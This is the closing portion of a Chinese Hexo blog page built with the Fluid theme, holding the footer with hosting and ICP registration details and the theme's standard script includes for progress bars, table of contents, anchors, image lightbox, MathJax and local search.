          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-copyright"></i> <a href="https://www.0error.net" target="_blank" rel="nofollow noopener"><span>2017 - 2024</span></a><br> <a target="_blank" rel="noopener" href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral">本网站由<img border="0" height="20" src="https://image.0error.net/img/2022/又拍云_logo2.png" srcset="/img/loading.gif" lazyload />提供CDN加速/云存储服务</a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
  
    <!-- 备案信息 ICP for China -->
    <div class="beian">
  <span>
    <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
      陇ICP备2021000723号-1
    </a>
  </span>
  
</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://cdn.jsdelivr.net/npm/mathjax@3.1.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
